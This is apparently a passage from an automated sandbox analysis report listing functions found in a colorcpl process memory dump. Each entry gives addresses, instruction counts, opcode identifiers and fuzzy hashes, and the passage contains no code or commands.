                                                                                                    • Opcode ID: 8667db606c47577863af1fa507d4bd660f032b527acde5805306137d5ec688d1
                                                                                                    • Instruction ID: 90baceb7faa9bd9bf25a3582e25cdb54d2c69bd0629491a439d55585179dcf89
                                                                                                    • Opcode Fuzzy Hash: 8667db606c47577863af1fa507d4bd660f032b527acde5805306137d5ec688d1
                                                                                                    • Instruction Fuzzy Hash: ED21B579291AD1CFD315CB2EC0A0FA173E6FB42714FA446A6E886C7A90D378D881D710
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E641CC7 Relevance: .1, Instructions: 79COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8e25c32065e1f44ba7ee35a8843c1dd259944a6f319484d3b00e2bcc29375ecf
                                                                                                    • Instruction ID: 0c10c0773f4027d578b4e5cc0be0c6952f55792bc53f26e692641507fe9f6e79
                                                                                                    • Opcode Fuzzy Hash: 8e25c32065e1f44ba7ee35a8843c1dd259944a6f319484d3b00e2bcc29375ecf
                                                                                                    • Instruction Fuzzy Hash: 0A217C35701B40DFD721DB29C890B46B7E6FF89714F644A69E996876A0DB70A802CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E669660 Relevance: .1, Instructions: 78COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d623f4153bdf99953d156d8cfcd4bb6ac4365a9bef0c2cfe29ff036ed5dd1c59
                                                                                                    • Instruction ID: 9f5a189d0797b9b148f05e23a3dc35159eca6303325ab3539723734491a6058a
                                                                                                    • Opcode Fuzzy Hash: d623f4153bdf99953d156d8cfcd4bb6ac4365a9bef0c2cfe29ff036ed5dd1c59
                                                                                                    • Instruction Fuzzy Hash: 85213530531783DBEB219B22C940B4637A3AB89724FE40B2AED52C69A4D730EC41CB59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E70BC01 Relevance: .1, Instructions: 77COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 61b4f1d8d144e717d759182dd9bf860c844f1d892085f153e6c3ceb13d60e067
                                                                                                    • Instruction ID: 7180c80c459444eca20056ae1665fce8c083320c417504ff8a218d1fb0c49a8e
                                                                                                    • Opcode Fuzzy Hash: 61b4f1d8d144e717d759182dd9bf860c844f1d892085f153e6c3ceb13d60e067
                                                                                                    • Instruction Fuzzy Hash: 1021BE76A00255EBEB119F59C884F6BBBB9EF46754F024665F8069B220DB34EE00CF91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6E9D70 Relevance: .1, Instructions: 76COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8e6689242450c0b1374e92ebd2e7380abb1c9bd64cfc4b2ea19698bdb3f7e53e
                                                                                                    • Instruction ID: 57478d83c520338e789229c920db1151028ceb88dfe3de2691aaa4c03aeb0bb1
                                                                                                    • Opcode Fuzzy Hash: 8e6689242450c0b1374e92ebd2e7380abb1c9bd64cfc4b2ea19698bdb3f7e53e
                                                                                                    • Instruction Fuzzy Hash: A621FF3AA01606ABCB22CF59C840F5F7BB9EF84760F544569F5149B390EA30ED00CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E671FB8 Relevance: .1, Instructions: 75COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3929694f3905af1f749a0eb407148cf8a485d6ad2bbe172017e1e65db35563ae
                                                                                                    • Instruction ID: 9bb555d95709434ed04c3e07d29d8e07f3de61f42281b7d3673860f6f29f7c40
                                                                                                    • Opcode Fuzzy Hash: 3929694f3905af1f749a0eb407148cf8a485d6ad2bbe172017e1e65db35563ae
                                                                                                    • Instruction Fuzzy Hash: 1B21C2B5E00245EFD720DF59C440E5AB7F9EF44750F50896BE545A7240D330ED41CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6ED8B0 Relevance: .1, Instructions: 75COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e922d32d8be57c82137771ab3e3846df4152a11a23d6bc7fecf85d7dd53ab7f2
                                                                                                    • Instruction ID: 34c4fc4bf6864f6a25a935d6466971bc45352063f9f8dca6a30d4db164e94e9f
                                                                                                    • Opcode Fuzzy Hash: e922d32d8be57c82137771ab3e3846df4152a11a23d6bc7fecf85d7dd53ab7f2
                                                                                                    • Instruction Fuzzy Hash: 1B21CF36A02646AFDB12CE69CC40F5B77E9EF95760F514539E918876A0D330E901CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E65BF60 Relevance: .1, Instructions: 73COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e83e16d1926ed5c85796518dff9c69daa76d54f9d97ef626b1c599b30ff42a04
                                                                                                    • Instruction ID: 4089f2b2a4e933fd7afc620b6da0c064618af91b2805a33e5e1217b29c06ce89
                                                                                                    • Opcode Fuzzy Hash: e83e16d1926ed5c85796518dff9c69daa76d54f9d97ef626b1c599b30ff42a04
                                                                                                    • Instruction Fuzzy Hash: DE21BDB1200352CFEB108F91C990B02BBE5EF05754F96866AD9054F34AC779E844CFE0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E62FB4C Relevance: .1, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2c127abe4603a0a42779a20a6cf4765ca859a8c0cd1fe1c92a88c9a2ea8e3ac3
                                                                                                    • Instruction ID: 95dfabfd06d29d4938d02e506a63412dbaaf7d486311bd28c70164ebc7a41c04
                                                                                                    • Opcode Fuzzy Hash: 2c127abe4603a0a42779a20a6cf4765ca859a8c0cd1fe1c92a88c9a2ea8e3ac3
                                                                                                    • Instruction Fuzzy Hash: 8021EF32900622DFC714CF65C4A06AAB3F5FF45311F9186BAC866A7650E771AA81CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E63BA30 Relevance: .1, Instructions: 71COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 14b53ade9a7183b9e2d79b028342502d5d29e7dc0e6f43e0776a18d399e6b7be
                                                                                                    • Instruction ID: de864cf208457b3d93cde899feede733b104f990f1a42eb4662515119f250d71
                                                                                                    • Opcode Fuzzy Hash: 14b53ade9a7183b9e2d79b028342502d5d29e7dc0e6f43e0776a18d399e6b7be
                                                                                                    • Instruction Fuzzy Hash: 60212636756AC1CFC3028B5EC854B5537EAFB4AB11F9406A1EC458B7D1E739EC00C651
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6BFEC5 Relevance: .1, Instructions: 69COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 73a1d63f3872ed16ace24c513418e422492c907ad4830f6c18c9454c9705e0c2
                                                                                                    • Instruction ID: 5abf42b6e85df1939d3683161501c3e2d5690d474f720292d9176db11357a078
                                                                                                    • Opcode Fuzzy Hash: 73a1d63f3872ed16ace24c513418e422492c907ad4830f6c18c9454c9705e0c2
                                                                                                    • Instruction Fuzzy Hash: F011AC72B00A12ABD6114E698CA0711F37EFB437A5F451726E92093AF0C762EDE1CBD0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E627BCD Relevance: .1, Instructions: 69COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8aff2ad48d0868055d471f314581c1a340ecd529334f2f5efbda3f4f6adf1869
                                                                                                    • Instruction ID: f189f8aa5d4f9806ed55680c3ddfb0e8b123ff8f8214d1cfbad350a78248e56d
                                                                                                    • Opcode Fuzzy Hash: 8aff2ad48d0868055d471f314581c1a340ecd529334f2f5efbda3f4f6adf1869
                                                                                                    • Instruction Fuzzy Hash: 5D110639A012569BCB249F79C460EAABBE6EF16720FD00B76E84697640D735E841CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E62B765 Relevance: .1, Instructions: 69COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: d86448af7a85f76f30b11cc367120008457a59bfea9257d28638fd3ed6e9a6c0
                                                                                                    • Instruction ID: c3a8105161fe252db4c9fc14b6d7732d5966bd1e7a1491f01246c1368c6bd29c
                                                                                                    • Opcode Fuzzy Hash: d86448af7a85f76f30b11cc367120008457a59bfea9257d28638fd3ed6e9a6c0
                                                                                                    • Instruction Fuzzy Hash: DC215772152681DFC721DF68CA40F59B7B9FB08718F944A39E00A97AA1C738B800CB48
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E659A18 Relevance: .1, Instructions: 68COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8e0df73b55497ddfadbe26ba18f34ecf871e8180e658a7c35b004a84e1aee84d
                                                                                                    • Instruction ID: 8c72f527728b94c6e21159bee50fd769bb383fbd549f3dec83dd38c135112fd2
                                                                                                    • Opcode Fuzzy Hash: 8e0df73b55497ddfadbe26ba18f34ecf871e8180e658a7c35b004a84e1aee84d
                                                                                                    • Instruction Fuzzy Hash: 0021AF72A11652DFC701CF14C900945BBBAFF43795B99D2A9E4188F314D731EE42CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E633720 Relevance: .1, Instructions: 67COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5d88f45dd0001f0d62fa2f1ec0471271e7e01065537810ddf14d08d74697b0f9
                                                                                                    • Instruction ID: 458a976cc54b0a0a72ece3e287d295966737298e48beb1fa692e8f998e93a12e
                                                                                                    • Opcode Fuzzy Hash: 5d88f45dd0001f0d62fa2f1ec0471271e7e01065537810ddf14d08d74697b0f9
                                                                                                    • Instruction Fuzzy Hash: CF21F274E012498BF701CF69C0547EEBBB9EB8931AF758228C82A573D0CBB89845C758
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6BDDC0 Relevance: .1, Instructions: 66COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 279751e000c75b3e3a4caf8ad9a84f939f4216867475f6537399e36d33891942
                                                                                                    • Instruction ID: 9f84b60dba393aaed81bf06a31ec4687911a4b8e3da554d5367cd4146a9d9443
                                                                                                    • Opcode Fuzzy Hash: 279751e000c75b3e3a4caf8ad9a84f939f4216867475f6537399e36d33891942
                                                                                                    • Instruction Fuzzy Hash: 36215971A12682DFD305CF54C280604B7F6FBAA314B90CA7EC026CF691DB30A442CF05
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E66BCA0 Relevance: .1, Instructions: 65COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 435ec20441679b49d0b9dc85c30e969150b76baf59bf81e95e4903d21b534327
                                                                                                    • Instruction ID: c78a12c9515744c72e231c08a760e0689a448c8ed60788396e5fb9c45edcb1db
                                                                                                    • Opcode Fuzzy Hash: 435ec20441679b49d0b9dc85c30e969150b76baf59bf81e95e4903d21b534327
                                                                                                    • Instruction Fuzzy Hash: AC112936A155D6DBD3019F1ACC10B55379AAF8A750F9407A1FE428B391EB39FD00C3A5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E66BFEC Relevance: .1, Instructions: 64COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2d7193f1e1caba985134c5dc1c82937ca3a0aad0c498a0644f45b1c7af5418cd
                                                                                                    • Instruction ID: bf7e518457143af7090d27b02f6de01d7f89da2326e6c7cbf0dada1bb374ee72
                                                                                                    • Opcode Fuzzy Hash: 2d7193f1e1caba985134c5dc1c82937ca3a0aad0c498a0644f45b1c7af5418cd
                                                                                                    • Instruction Fuzzy Hash: F5113F78252AD2CBD7148B6AC0A0BA173E9FB0A714F98065AE8CA87754D37ADC81C710
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6CD660 Relevance: .1, Instructions: 63COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 84d8c099071c2c2e27e0d7cc270b2f1a9f3cfe9a568463a6261584609a9bdb37
                                                                                                    • Instruction ID: a1f1659c767ae1a18c0e495b6161840941de1225dd4d560abce6eb817ffa20de
                                                                                                    • Opcode Fuzzy Hash: 84d8c099071c2c2e27e0d7cc270b2f1a9f3cfe9a568463a6261584609a9bdb37
                                                                                                    • Instruction Fuzzy Hash: 55110635610684AFDB01DF66C540B9ABBF6EF9A354F604A6AD49A97300E770F901CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E64DDB1 Relevance: .1, Instructions: 62COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ff33570f2c2ac336df972e6f694a79a871e76e2bff359fe41781ddbb4369fb16
                                                                                                    • Instruction ID: ee51aa6731eb5fcef2869f339187e263c7c3a234e9f0bcaf4bd0530e5128c16d
                                                                                                    • Opcode Fuzzy Hash: ff33570f2c2ac336df972e6f694a79a871e76e2bff359fe41781ddbb4369fb16
                                                                                                    • Instruction Fuzzy Hash: E9210375A022C9DFEB029FA8C940BDDBBB5FF16704FA406A9E5009B391C7799D00C768
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6D7A11 Relevance: .1, Instructions: 62COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 512b137ad89a7df6b990cf685ed85c22080462fca4e19b5674eeca6d299f7e61
                                                                                                    • Instruction ID: 6408e6eb3aa9cf878809b8c4ce785bfb06e89b58256dcf50642616031da25b3a
                                                                                                    • Opcode Fuzzy Hash: 512b137ad89a7df6b990cf685ed85c22080462fca4e19b5674eeca6d299f7e61
                                                                                                    • Instruction Fuzzy Hash: 8F214471A0038ADBDB08CF94D890BECB3B1FB49721FA4831AE465A6280D7786945CB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6B98E7 Relevance: .1, Instructions: 62COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0f0029a5fddd162ff8ec647c63b68ca8ae11ce565b8650359554b74b1a6a5eab
                                                                                                    • Instruction ID: 49ca17d5b7bcd59b0c2f183cb7449571dbb6cc2eae53a43b274283d9c08f5271
                                                                                                    • Opcode Fuzzy Hash: 0f0029a5fddd162ff8ec647c63b68ca8ae11ce565b8650359554b74b1a6a5eab
                                                                                                    • Instruction Fuzzy Hash: 07110A32B10156ABDB049B58C984A5EB7BDAF4C790F5D426DE405E3300DF749D00C794
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E62FAA4 Relevance: .1, Instructions: 61COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4870b528d7b25b4471f0b5810bc38dc9778e41db59f1a3cb7c06885f010ffa25
                                                                                                    • Instruction ID: 1418eb29ae7b92fa76828ddfdc43fd133ddfdd8c05150317b8598073ab21796a
                                                                                                    • Opcode Fuzzy Hash: 4870b528d7b25b4471f0b5810bc38dc9778e41db59f1a3cb7c06885f010ffa25
                                                                                                    • Instruction Fuzzy Hash: 0C119035600346EFDB25CF61CC14F5AB7AAEB86314F9486A9E441AB280D771BD82CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E665A01 Relevance: .1, Instructions: 59COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6ed659946fb9fc9b79206869a8043569f9835a961de5c7259737506ae61f8194
                                                                                                    • Instruction ID: dae6a4c809f9849d89ba2a1eeecf6f9f9b1bb18dc009edc394850fc93caf2f5a
                                                                                                    • Opcode Fuzzy Hash: 6ed659946fb9fc9b79206869a8043569f9835a961de5c7259737506ae61f8194
                                                                                                    • Instruction Fuzzy Hash: F9112B36252694BFC7225F45CD51F1B3B7AEF8DB80F510A28B6045B2A0C771DC00D794
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6FDDC6 Relevance: .1, Instructions: 58COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 93f4e7af98a6c385ea36c919ef03bbe4d37044313034a9aa39d0b50dfd9d5ba1
                                                                                                    • Instruction ID: b769fb1442875da443bfb3f9669ef425b9ef7899d847a575db8ec909a1901216
                                                                                                    • Opcode Fuzzy Hash: 93f4e7af98a6c385ea36c919ef03bbe4d37044313034a9aa39d0b50dfd9d5ba1
                                                                                                    • Instruction Fuzzy Hash: EB01D226B01145DBCB059A6D8C60B7AB38BABE5220F944335E575C7388DE34F81282A5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6ADA1D Relevance: .1, Instructions: 58COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 012a71606a4d59d9462653767c3d49fe1bd4ebf1bf8dc5cce1905e6e7a89c31f
                                                                                                    • Instruction ID: 1c5b80b79caec7044b15583acd0ee277debe14f85325621d5fdad3bff6f97b58
                                                                                                    • Opcode Fuzzy Hash: 012a71606a4d59d9462653767c3d49fe1bd4ebf1bf8dc5cce1905e6e7a89c31f
                                                                                                    • Instruction Fuzzy Hash: F6112132904248BFCB019F6CC8808BEBBB9EFD9304F50816AF9448B250CB319D40C7A9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E627D41 Relevance: .1, Instructions: 57COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 60c823d4a219f1a9f007e6fc68887373275c2c513e16b3fc8dced40f8957b3e8
                                                                                                    • Instruction ID: a66bff46b9094bb12273d03c8e52f6f5e81f89c43fc52e67f04a29a897087586
                                                                                                    • Opcode Fuzzy Hash: 60c823d4a219f1a9f007e6fc68887373275c2c513e16b3fc8dced40f8957b3e8
                                                                                                    • Instruction Fuzzy Hash: 750104751026A39BC3168A15D850E267BB7DFC6B507D58A7DE8498B300DB38F801CB94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6ED6F0 Relevance: .1, Instructions: 57COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                                                                                    • Instruction ID: 5d13d8ea6f86f1a925fc3647abd25536cd54f56c5f7145502e31faa5f5385e35
                                                                                                    • Opcode Fuzzy Hash: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                                                                                    • Instruction Fuzzy Hash: 9E016179B1114AAB9F04CBAAC944DAF7FBDEFD5A44F510269A915D3240E730EE01CB60
                                                                                                    Uniqueness

